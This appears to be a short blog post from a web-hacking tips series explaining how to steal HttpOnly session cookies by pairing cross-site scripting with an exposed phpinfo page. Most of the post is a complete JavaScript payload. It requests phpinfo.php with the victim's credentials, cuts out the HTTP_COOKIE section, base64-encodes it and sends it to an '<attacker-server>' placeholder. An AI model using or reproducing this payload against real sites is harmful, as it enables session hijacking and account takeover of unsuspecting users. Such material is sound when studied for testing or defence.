Week 8 - Stealing HttpOnly Cookies from PHPINFO
Last updated
Last updated
Have you ever been (*legally) hacking a web application and found the session cookie to be marked as ‘HttpOnly’? Well with a little bit of luck and some JavaScript, you can still access a user’s session! In week 8 of the Website Hacking Tips + Tricks series, I’ll be showing you how.
HttpOnly is a flag included in the Set-Cookie HTTP response header and means the cookie is unable to be read/accessed by client-side JavaScript. So Cross-Site Scripting payloads cannot retrieve a user’s session :/
However, many PHP applications include a PHPINFO file containing information regarding the site’s configuration. Most importantly, the PHPINFO file lists EVERY cookie for the user’s current session, even the ones marked as ‘HttpOnly’.
We can create a Cross-Site Scripting payload to retrieve the source code of the PHPINFO file and send it to our server. Then we can view the cookies and gain access to the user’s session! This can be accomplished with the below JavaScript:
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
var url = ‘<target-url>/phpinfo.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();
function reqListener() {
var req2 = new XMLHttpRequest();
const sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE') + 1 );
req2.open('GET', '<attacker-server>/?data=' + btoa(sess), false);
req2.send()
};
</script>
All you need to specify is the URL containing the PHPINFO file (<target-url>), and the server listening for a callback (<attacker-server>).